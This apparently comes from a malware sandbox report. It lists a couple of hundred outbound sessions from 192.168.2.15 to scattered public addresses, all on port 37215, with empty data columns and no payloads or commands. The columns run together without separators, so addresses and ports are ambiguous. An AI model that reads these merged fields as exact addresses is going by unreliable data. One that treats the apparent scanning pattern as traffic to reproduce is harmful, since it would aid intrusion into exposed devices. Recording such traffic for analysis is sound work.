                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7913192.168.2.1548760156.239.231.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7914192.168.2.1547824197.225.109.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7915192.168.2.1551394181.116.161.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7916192.168.2.1552754186.44.123.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7917192.168.2.154967637.196.203.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7918192.168.2.1558510121.243.217.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7919192.168.2.1540724197.39.156.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7920192.168.2.1537854222.129.117.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7921192.168.2.1541056197.21.0.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7922192.168.2.1548998190.204.82.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7923192.168.2.1552614102.43.56.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7924192.168.2.1533264186.48.136.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7925192.168.2.1558182222.91.136.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7926192.168.2.154762294.85.9.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7927192.168.2.1537986122.127.58.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7928192.168.2.153662041.136.184.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7929192.168.2.154087237.94.113.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7930192.168.2.154833894.38.97.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7931192.168.2.153319445.13.33.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7932192.168.2.1560676186.73.163.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7933192.168.2.155361894.178.35.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7934192.168.2.1554890156.118.8.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7935192.168.2.1558620197.147.106.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7936192.168.2.1549310157.230.56.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7937192.168.2.1560190121.238.184.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7938192.168.2.1554732121.192.161.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7939192.168.2.1542088122.232.207.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7940192.168.2.153903231.13.115.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7941192.168.2.1545206122.24.205.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7942192.168.2.1544720138.13.18.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7943192.168.2.1533834122.187.143.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7944192.168.2.154857843.50.213.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7945192.168.2.1552884181.229.133.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7946192.168.2.155980237.37.29.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7947192.168.2.1537208222.75.135.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7948192.168.2.1550178156.61.254.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7949192.168.2.1557900121.62.253.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7950192.168.2.1536522122.225.230.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7951192.168.2.1552426222.67.228.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7952192.168.2.154308645.104.186.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7953192.168.2.1551926197.252.202.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7954192.168.2.154119637.215.77.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7955192.168.2.1559032102.57.90.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7956192.168.2.1551400186.109.138.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7957192.168.2.155978045.231.102.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7958192.168.2.1534768138.156.43.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7959192.168.2.1541486122.251.200.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7960192.168.2.153312437.180.5.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7961192.168.2.1560170222.32.180.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7962192.168.2.1549004181.225.27.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7963192.168.2.1548688122.21.6.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7964192.168.2.1541908222.164.222.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7965192.168.2.154625637.100.221.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7966192.168.2.1556772197.33.196.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7967192.168.2.155832641.36.28.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7968192.168.2.1539792157.244.174.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7969192.168.2.1552468190.236.7.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7970192.168.2.1550692122.160.10.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7971192.168.2.1553694122.86.182.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7972192.168.2.1541852190.15.129.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7973192.168.2.1553844121.2.197.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7974192.168.2.1541588181.97.128.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7975192.168.2.1548738186.29.48.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7976192.168.2.1552746190.72.41.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7977192.168.2.1557748157.169.7.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7978192.168.2.1556724222.191.80.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7979192.168.2.1550870157.217.202.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7980192.168.2.1558928197.40.244.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7981192.168.2.155030876.57.70.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7982192.168.2.153285445.229.204.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7983192.168.2.1549854197.97.18.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7984192.168.2.1534290197.170.165.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7985192.168.2.154387845.186.25.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7986192.168.2.155444637.115.5.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7987192.168.2.153279094.196.225.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7988192.168.2.1540884181.221.246.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7989192.168.2.153390031.216.65.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7990192.168.2.1558042122.129.59.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7991192.168.2.154995031.112.104.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7992192.168.2.155787445.162.69.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7993192.168.2.1555814190.59.177.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7994192.168.2.1535772197.88.76.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7995192.168.2.1536580138.81.67.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7996192.168.2.154199031.103.167.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7997192.168.2.153370645.121.218.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7998192.168.2.1556402108.222.139.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7999192.168.2.1559772110.41.168.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8000192.168.2.153602294.128.196.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8001192.168.2.155470845.149.110.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8002192.168.2.1559546156.117.249.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8003192.168.2.154651045.161.89.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8004192.168.2.154113641.244.130.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8005192.168.2.1536004222.40.129.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8006192.168.2.153315894.192.4.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8007192.168.2.1556744186.200.86.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8008192.168.2.1559906186.210.248.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8009192.168.2.1560704138.92.11.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8010192.168.2.1533094102.152.212.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8011192.168.2.1551660122.32.178.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8012192.168.2.154352631.14.86.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8013192.168.2.155517841.222.31.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8014192.168.2.155705641.11.80.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8015192.168.2.153282045.219.149.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8016192.168.2.153328037.56.89.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8017192.168.2.1557886190.82.75.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8018192.168.2.1553540157.9.26.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8019192.168.2.1536692102.176.153.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8020192.168.2.1553570102.156.158.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8021192.168.2.1538690222.3.96.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8022192.168.2.1544482190.137.179.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8023192.168.2.1549494186.25.121.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8024192.168.2.1533510222.198.26.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8025192.168.2.1556212222.175.32.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8026192.168.2.1545368190.242.203.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8027192.168.2.1537636186.19.229.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8028192.168.2.153334441.184.110.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8029192.168.2.153564441.156.230.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8030192.168.2.1553372156.83.172.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8031192.168.2.154014841.226.93.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8032192.168.2.155312637.140.73.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8033192.168.2.1552880121.211.219.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8034192.168.2.1536634157.29.31.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8035192.168.2.1552034122.238.32.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8036192.168.2.1533024102.16.87.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8037192.168.2.154256041.110.177.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8038192.168.2.1551954197.180.230.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8039192.168.2.1536654157.114.93.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8040192.168.2.1557990157.162.6.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8041192.168.2.1542190157.51.1.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8042192.168.2.1557112181.127.196.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8043192.168.2.1556206186.112.169.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8044192.168.2.1555170181.149.141.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8045192.168.2.154873241.84.135.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8046192.168.2.153585045.41.135.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8047192.168.2.1534022181.161.23.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8048192.168.2.1547846197.63.201.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8049192.168.2.1535220222.190.19.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8050192.168.2.1551900156.17.185.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8051192.168.2.154064641.71.99.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8052192.168.2.155659619.93.73.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8053192.168.2.154609845.100.31.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8054192.168.2.1543230197.197.143.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8055192.168.2.1542034102.104.133.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8056192.168.2.155431294.252.140.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8057192.168.2.156017294.223.93.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8058192.168.2.154799031.85.73.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8059192.168.2.155973831.22.246.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8060192.168.2.1550988156.150.76.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8061192.168.2.155149245.3.159.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8062192.168.2.156051631.185.93.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8063192.168.2.1559906156.6.234.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8064192.168.2.1555536102.60.140.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8065192.168.2.1553670222.164.90.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8066192.168.2.1540128222.50.28.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8067192.168.2.154232037.170.150.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8068192.168.2.153837641.105.185.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8069192.168.2.1558992121.209.183.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8070192.168.2.155329494.0.112.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8071192.168.2.1539830219.125.96.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8072192.168.2.1548838197.23.94.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8073192.168.2.153617094.121.111.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8074192.168.2.1535264122.53.223.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8075192.168.2.155882494.169.131.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8076192.168.2.1541316121.203.55.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8077192.168.2.1533492121.162.166.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8078192.168.2.156063231.21.155.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8079192.168.2.1542384181.218.25.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8080192.168.2.155876641.151.33.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8081192.168.2.1551846190.186.29.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8082192.168.2.1538762102.74.143.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8083192.168.2.1535548121.180.104.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8084192.168.2.153708245.16.90.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8085192.168.2.153712045.238.142.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8086192.168.2.1550292222.63.50.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8087192.168.2.1542370157.39.243.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8088192.168.2.15353644.220.226.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8089192.168.2.1532860122.208.213.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8090192.168.2.1544332190.188.32.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8091192.168.2.1555682222.222.49.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8092192.168.2.154186641.77.71.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8093192.168.2.155557841.23.42.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8094192.168.2.155247031.185.11.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8095192.168.2.1559570197.146.61.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8096192.168.2.1538660121.192.64.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8097192.168.2.153924441.21.10.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8098192.168.2.1560976121.48.107.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8099192.168.2.1546176222.238.47.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8100192.168.2.1543816197.55.11.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8101192.168.2.1547464156.222.165.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8102192.168.2.1538310157.93.162.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8103192.168.2.1536086186.249.15.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8104192.168.2.1555770122.17.213.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8105192.168.2.1549098190.152.145.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8106192.168.2.154553431.234.67.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8107192.168.2.155429241.159.238.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8108192.168.2.1546744115.95.136.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8109192.168.2.1545528181.17.219.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8110192.168.2.154307894.113.193.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8111192.168.2.1557300222.222.207.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8112192.168.2.1545376181.44.101.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8113192.168.2.1549196197.203.2.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8114192.168.2.1543380186.30.252.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8115192.168.2.155564694.225.225.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8116192.168.2.1560534156.93.172.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8117192.168.2.1546916157.17.55.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8118192.168.2.1551874157.131.157.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8119192.168.2.1538406186.22.228.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8120192.168.2.155706645.24.129.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8121192.168.2.155315894.212.179.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8122192.168.2.155518637.142.197.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8123192.168.2.1557108156.217.251.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8124192.168.2.1534332138.71.38.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8125192.168.2.1545968181.218.168.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8126192.168.2.155816041.193.18.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8127192.168.2.1554546121.27.232.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8128192.168.2.1549398181.100.154.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8129192.168.2.1544898157.64.115.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8130192.168.2.1535190197.69.92.037215
                                              TimestampBytes transferredDirectionData


